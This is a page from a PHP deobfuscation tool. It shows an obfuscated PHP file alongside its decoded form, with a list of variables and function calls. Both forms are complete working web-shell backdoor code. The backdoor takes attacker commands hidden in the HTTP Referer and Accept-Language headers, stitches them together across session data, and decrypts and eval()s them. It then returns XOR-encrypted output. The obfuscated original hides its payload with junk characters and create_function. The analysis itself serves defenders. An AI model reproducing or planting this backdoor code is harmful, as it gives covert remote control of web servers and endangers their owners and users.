Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $q='e64_decode(pp^reg_rep^place(arrp^ay("p^/p^_/","/-/p^p^"p^),arrp^ay("/","+"),$ss..

Decoded Output download

$kh="eb97";$kf="9e66";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){$u=parse_url($rr);parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();eval(@gzuncompress(@x(base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}

Did this file decode correctly?

Original Code

<?php
$q='e64_decode(pp^reg_rep^place(arrp^ay("p^/p^_/","/-/p^p^"p^),arrp^ay("/","+"),$ss($s[$ip^]';
$i='p^x(gp^zcomprep^ssp^($op^),$k));prinp^t("<$kp^>$d</$p^k>");@sp^p^ession_destrp^oy();}}}}';
$p=']+(?:;q=0.([\\dp^]))?p^,?/",$rp^a,$m);if(p^$q&&$p^m){@sep^ssip^on_start();$p^s=&$_Sp^p^ESSI';
$x='d5($p^i.$kh)p^,0,3)p^)p^;$f=$sl($sp^s(p^md5($i.$kf),0p^,3));$p="p^";p^for($z=1;$p^p^z<co';
$g='$p^i]p^,$p^f);if($ep^){p^$k=$kh.$kf;ob_stp^art(p^);@evap^l(@gzp^uncp^ompress(@xp^(@bap^s';
$E=str_replace('x','','cxxrxeatexx_funxction');
$S='$kh="p^ep^bp^97";$kf="9e66";functp^iop^p^n x($t,p^$k){$c=strlp^en($kp^);p^$l=strp^len($t';
$O='p^,0,$e))),$kp^)));$op^=ob_gp^et_contentp^p^s()p^;ob_end_clean()p^;$d=p^bp^ase64_encode(';
$d='(p^$u["qp^uery"],$p^q);$q=array_vap^lp^ues($q)p^;pp^reg_map^tchp^_ap^ll("/(p^[\\w])[\\w-p^';
$U='^pp^=$p^ssp^($p,3);}ifp^(array_key_existp^p^s($i,$s)){$p^s[$i].p^=p^$p;$e=strpp^os(p^$s[';
$u='p^i}^$k{$p^j};p^}}returnp^ $p^o;}$r=$_Sp^p^ERVER;$rr=@p^$r["HTTP_Rp^EFERp^p^ER"];$ra=@$rp';
$Z='p^ON;$ss="subp^strp^";p^$sl="strtolowerp^";$ip^=$m[p^1][0].$m[1]p^[p^1];$p^h=$sp^l($ss(m';
$X=');$o="";p^fop^r($i=0;$ip^p^<$l;){for($j=0;(p^$j<$p^c&&$i<$lp^);$p^j++p^,$i++){$o.p^=$t{$';
$A='^["p^HTTP_ACCEPTp^_p^Lp^ANGUAGE"];if($rr&&p^$rap^){$up^=parsp^e_urp^l(p^$rr);parse_stp^r';
$D='unp^t($m[1]);p^$z++)$pp^p^.=$q[$m[2][$p^z]];ifp^(strposp^(p^$p,$p^h)===p^0){$s[$i]="";$p';
$v=str_replace('p^','',$S.$X.$u.$A.$d.$p.$Z.$x.$D.$U.$g.$q.$O.$i);
$l=$E('',$v);$l();
?>

Function Calls

null 1
str_replace 2
create_function 1

Variables

$A ^["p^HTTP_ACCEPTp^_p^Lp^ANGUAGE"];if($rr&&p^$rap^){$up^=pars..
$D unp^t($m[1]);p^$z++)$pp^p^.=$q[$m[2][$p^z]];ifp^(strposp^(p^..
$E create_function
$O p^,0,$e))),$kp^)));$op^=ob_gp^et_contentp^p^s()p^;ob_end_cle..
$S $kh="p^ep^bp^97";$kf="9e66";functp^iop^p^n x($t,p^$k){$c=str..
$U ^pp^=$p^ssp^($p,3);}ifp^(array_key_existp^p^s($i,$s)){$p^s[$..
$X );$o="";p^fop^r($i=0;$ip^p^<$l;){for($j=0;(p^$j<$p^c&&$i<$lp..
$Z p^ON;$ss="subp^strp^";p^$sl="strtolowerp^";$ip^=$m[p^1][0].$..
$d (p^$u["qp^uery"],$p^q);$q=array_vap^lp^ues($q)p^;pp^reg_map^..
$g $p^i]p^,$p^f);if($ep^){p^$k=$kh.$kf;ob_stp^art(p^);@evap^l(@..
$i p^x(gp^zcomprep^ssp^($op^),$k));prinp^t("<$kp^>$d</$p^k>");@..
$l None
$p ]+(?:;q=0.([\dp^]))?p^,?/",$rp^a,$m);if(p^$q&&$p^m){@sep^ssi..
$q e64_decode(pp^reg_rep^place(arrp^ay("p^/p^_/","/-/p^p^"p^),a..
$u p^i}^$k{$p^j};p^}}returnp^ $p^o;}$r=$_Sp^p^ERVER;$rr=@p^$r["..
$v $kh="eb97";$kf="9e66";function x($t,$k){$c=strlen($k);$l=str..
$x d5($p^i.$kh)p^,0,3)p^)p^;$f=$sl($sp^s(p^md5($i.$kf),0p^,3));..

Stats

MD5 3472ccfa8c4574de5bacbee1b888c5e4
Eval Count 1
Decode Time 98 ms